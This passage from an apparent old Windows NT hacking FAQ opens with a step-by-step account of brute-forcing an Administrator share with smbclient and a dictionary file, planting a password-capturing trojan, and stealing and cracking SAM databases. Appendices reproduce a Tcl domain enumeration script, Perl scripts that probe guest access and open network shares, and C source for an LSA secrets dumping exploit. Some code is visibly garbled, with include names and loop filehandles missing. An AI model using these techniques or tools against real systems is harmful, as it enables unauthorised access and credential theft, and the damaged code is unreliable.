returned, and this is plugged into the hacked smbclient like so - smbclient \\\\INNOCENT\\WINNT$ -I 10.10.10.2 -d 3 -n WHATEVER -m \ LANMAN2 -U ADMINISTRATOR Note that the hacker is trying to access the C drive, is using debug level 3 to see errors (and see how long before an error occurs), forged his computer's name, and dummied down the passwords to try Lan Manager style (uppercase) only. Several simple passwords are tried, and it looks like Administrator has not been altered to lock out incorrect tries. However the usual easy passwords do not work. The hacker is not frustrated. He decides to throw his uppercase dictionary at it - smbclient \\\\INNOCENT\\WINNT$ -I 10.10.10.2 -d 0 -n WHATEVER -m \ LANMAN2 -U ADMINISTRATOR < dictionary.file.upppercase The hacked smbclient will continue until the dictionary file is exhausted, the hacker stops the program, or he gets in. After a while, success. The hacker uploads a trojan to \SYSTEM32 to capture passwords. Then the hacker goes to \SYSTEM32\CONFIG\SAM and \REPAIR and finds copies of the SAM database. These are copied down to his home machine. The hacker disconnects and proceeds to use PWDump and L0phtcrack to get ALL passwords. The hacker knows that some of the passwords might be old -- after all, he couldn't grab the live SAM database. But between the old passwords and the trojan, the hacker isn't even worried if the Administrator changes passwords. The hacker will simply use another account name and check the \TEMP directory for the collected passwords. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Appendix Section A-01. Source Code for an Audit Script --------------------------------------------------------------------------- This source was originally posted to ISS' NT Security mailing list, and I've lost the original author of the code. Anyway, here it is reproduced without permission, but then again it's probably in a mailing list archive somewhere anyway... ;-) # Audit accounts, privileges, servers, workstations, and trust relationships # of a domain. The domain name can be specified as an argument, or else the # current domain will be used # load extensions # load Christopher Sedore's NT extensions (the system portion) load ntsys.dll # Proceedure forward definitions # check if account is enabled - returns the string "ENABLED" or "DISABLED" # there is a special case if accountinfolist is set to 0. the string "GROUP" # is returned in this case. proc checkAccountStatus {accountinfolist} { if {$accountinfolist == 0} then {set enablestatus "GROUP "; return $enablestatus;} if {[lsearch -glob $accountinfolist {*[U][F][_][A][C][C][O][U][N][T][D][I][S][A][B][L][E]*}] < 0} \ then {set enablestatus "ENABLED"} \ else {set enablestatus "DISABLED"}; return $enablestatus; } # print list. If list length is 0, then "NONE" is printed. proc printList {list printdest} { set listindex 0; if {[llength $list] == 0} then {puts $printdest "NONE"; return;}; while {$listindex < [llength $list]} { puts $printdest "[lindex $list $listindex]"; incr listindex; } } # print list with account status check # NT_UserGetInfo is called first with the account name given in list, if that fails # then it might be a local account so the machine name and "\" are stripped off the # front and NT_UserGetInfo is called again. If that fails then we set accountinfolist # to 0. proc printListWithAccountStatus {list printdest server} { upvar pdc p_pdc; set listindex 0; if {[llength $list] == 0} then {puts $printdest "NONE"; return;}; while {$listindex < [llength $list]} { if {[catch {set accountinfolist [NT_UserGetInfo $server [lindex $list $listindex]]}] != 0} \ then {set cleanname [string trimleft [lindex $list $listindex] [string trimleft $server "\\"]]; if {[catch {set accountinfolist [NT_UserGetInfo $server [string trimleft $cleanname "\\"]]}] != 0} then {set accountinfolist 0}}; puts $printdest "[lindex $list $listindex] : [checkAccountStatus $accountinfolist]"; incr listindex; } } # clean up machine account list proc cleanMachineAccountList {machinelist} { set listindex 0; set templist {}; while {$listindex < [llength $machinelist]} { set templist [concat $templist [lindex $machinelist $listindex]]; incr listindex; } set listindex 0; set list {}; while {$listindex < [llength $templist]} { set list [concat $list [string trimright [format "\\\\\\\\%s" [lindex $templist $listindex]] {$}]]; incr listindex 3; } return $list; } # MAIN CODE # check command line args and set domain to that specified on the cmdline, or # else a empty string (to represent the current domain) if {$argc > 0} then {set logfile [lindex $argv 0]} else {set logfile {c:\AuditLog.txt}} if {$argc == 2} then {set domain [lindex $argv 1]} else {set domain {}} # open audit log file set auditlog [open $logfile a+] # find Primary Domain Controller set pdc [NT_GetDCName $domain] # print tag for DOMAIN STATISTICS section puts $auditlog "\[DOMAIN STATISTICS\]\n" # get DCs and clean up list for printing set dclist [cleanMachineAccountList [NT_UserEnum $pdc {FILTER_SERVER_TRUST_ACCOUNT}]] # print them out puts $auditlog "Domain Controllers:\n" printList $dclist $auditlog # print PDC name puts $auditlog "\nPrimary Domain Controller:\n\n$pdc\n" # get domain user accounts set userlist [NT_UserEnum $pdc {}] # print user list puts $auditlog "\nDomain Users:\n" printList $userlist $auditlog # get groups defined in the domain set grouplist [NT_GroupEnum $pdc] # print group list puts $auditlog "\nGroups defined in the domain:\n" printList $grouplist $auditlog # print users in each group and the account status set listindex 0 while {$listindex < [llength $grouplist]} { set templist [NT_GroupGetUsers $pdc [lindex $grouplist $listindex]]; puts $auditlog "\nUsers in the \"[lindex $grouplist $listindex]\" group:\n"; printListWithAccountStatus $templist $auditlog $pdc; incr listindex; } # get machine accounts in domain for workstations and non-DC servers set wrkstalist [cleanMachineAccountList [NT_UserEnum $pdc {FILTER_WORKSTATION_TRUST_ACCOUNT}]] # print them out puts $auditlog "\nWorkstations and non-DC servers in the domain:\n" printList $wrkstalist $auditlog # get trust relationships set trustlist [cleanMachineAccountList [NT_UserEnum $pdc {FILTER_INTERDOMAIN_TRUST_ACCOUNT}]] # print them out puts $auditlog "\nDomains with which trust relationships are configured:\n" printList $trustlist $auditlog # move on to machine statistics puts $auditlog "\n\[MACHINE STATISTICS\]\n" # do domain controllers # put in error handling for RPC server unavailable for NT_LocalGroupEnum set listindex 0 while {$listindex < [llength $dclist]} { if {[catch {NT_LocalGroupEnum [lindex $dclist $listindex]}machinegrouplist]} \ then {puts $auditlog "\n[lindex $dclist $listindex] unavailable"; incr listindex; continue;}; puts $auditlog "\n[lindex $dclist $listindex] groups:\n"; printList $machinegrouplist $auditlog; set tempindex 0; while {$tempindex < [llength $machinegrouplist]} { set templist [NT_LocalGroupGetUsers [lindex $dclist $listindex] [lindex $machinegrouplist $tempindex]]; puts $auditlog "\nUsers in the \"[lindex $machinegrouplist $tempindex]\"group:\n"; printListWithAccountStatus $templist $auditlog [lindex $dclist $listindex]; incr tempindex; } incr listindex; } # do workstations and non-DC servers controllers set listindex 0 while {$listindex < [llength $wrkstalist]} { if {[catch {NT_LocalGroupEnum [lindex $wrkstalist $listindex]}machinegrouplist]} \ then {puts $auditlog "\n[lindex $wrkstalist $listindex] unavailable"; incr listindex; continue;}; puts $auditlog "\n[lindex $wrkstalist $listindex] groups:\n"; printList $machinegrouplist $auditlog; set tempindex 0; while {$tempindex < [llength $machinegrouplist]} { set templist [NT_LocalGroupGetUsers [lindex $wrkstalist $listindex] [lindex $machinegrouplist $tempindex]]; puts $auditlog "\nUsers in the \"[lindex $machinegrouplist $tempindex]\"group:\n"; printListWithAccountStatus $templist $auditlog [lindex $wrkstalist $listindex]; incr tempindex; } incr listindex; } close $auditlog --------------------------------------------------------------------------- Appendix Section A-02. Perl Code for NETSCRIPT.PL --------------------------------------------------------------------------- Author is David LeBlanc ------------- start netcheck.pl(Win NT Version) --------------------------- if(length($ARGV[0]) == 0) { print "Usage is perl netcheck.pl IP"; exit 0; } open(NBT, "nbtstat -a ".$ARGV[0]." | "); while() { if(!grep(/Registered/, $_)) { if(grep(/<00> UNIQUE/,$_)) { @machine = split(/\s/, $_); } if(grep(/<00> GROUP/, $_)) { @domain = split(/\s/, $_); } } } print "Machine = ".$machine[0]."\tDomain = ".$domain[0]."\n"; print "\nChecking Guest Access\n"; open(GUESTCHK, "net use \\\\".$ARGV[0]."\\ipc\$ /user:guest guest | "); while() { if(grep(/error/,$_)) { print("Guest access denied\n"); } } print "\nObtaining list of shares\n"; open(NTSH, "net view \\\\".$ARGV[0]." | "); while() { if(grep(/Disk/,$_)) { @tmp = split(/\s/, $_); push(@shares, $tmp[0]); } print; } foreach $share (@shares) { open(NETUSE, "net use \\\\".$ARGV[0]."\\".$share." | "); while() { if(grep(/successfully/,$_)) { print $share." opened\n"; } } } ------------- end netcheck.pl(Win NT Version) --------------------------- ------------- start netcheck.pl(Win 95 Version) --------------------------- if(length($ARGV[0]) == 0) { print "Usage is perl netcheck.pl IP"; exit 0; } open(NBT, "nbtstat -A ".$ARGV[0]." | "); while() { print; if(grep(/Registered/, $_)) { if(grep(/<00> UNIQUE/,$_)) { @machine = split(/\s/, $_); } if(grep(/<00> GROUP/, $_)) { @domain = split(/\s/, $_); } } } print "Machine = ".$machine[0]."\tDomain = ".$domain[0]."\n"; print "\nChecking Guest Access\n"; open(GUESTCHK, "net use \\\\".$ARGV[0]."\\ipc\$ /user:guest guest | "); while() { if(grep(/error/,$_)) { print("Guest access denied\n"); } } print "\nObtaining list of shares\n"; open(NTSH, "net view \\\\".$machine[0]." | "); while() { if(grep(/Disk/,$_)) { @tmp = split(/\s/, $_); push(@shares, $tmp[0]); } print; } foreach $share (@shares) { open(NETUSE, "net use \\\\".$machine[0]."\\".$share." | "); while() { if(grep(/successfully/,$_)) { print $share." opened\n"; } } } ------------- end netcheck.pl(Win 95 Version) --------------------------- Appendix Section A-03. Source Code for NT LSA Exploit --------------------------------------------------------------------------- Author is Paul Ashton /* * Must be run as administrator. Might be a good thing to play with after * running getadmin ;-0 -- also note this works on raw 4.0 with no SPs. * * Run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data * or any other registry key under NTLM\security\policy\secrets. * You should be able to get service passwords, cached password hashes * of the last users to login, RAS accounts and passwords, workstation * passwords for domain access, etc. */ #include #include #include "ntsecapi.h" #define AST(x) if (!(x)) {printf("Failed line %d\n", __LINE__);exit(1);} else void write(); PLSA_UNICODE_STRING str(LPWSTR x) { static LSA_UNICODE_STRING s; s.Buffer=x; s.Length=wcslen(x)*sizeof(WCHAR); s.MaximumLength = (wcslen(x)+1)*2; return &s; } int _cdecl main(int argc, char *argv[]) { LSA_HANDLE pol; PLSA_UNICODE_STRING foo; LSA_OBJECT_ATTRIBUTES attrs; WCHAR keyname[256]=L""; WCHAR host[256]=L""; wsprintfW(keyname, L"%hS", argv[1]); if(argc == 3) wsprintfW(host, L"%hS", argv[2]); memset(&attrs, 0, sizeof(attrs)); AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol)); AST(!LsaRetrievePrivateData(pol, str(keyname), &foo)); write(1, foo->Buffer, foo->Length); LsaClose(pol); exit(0); }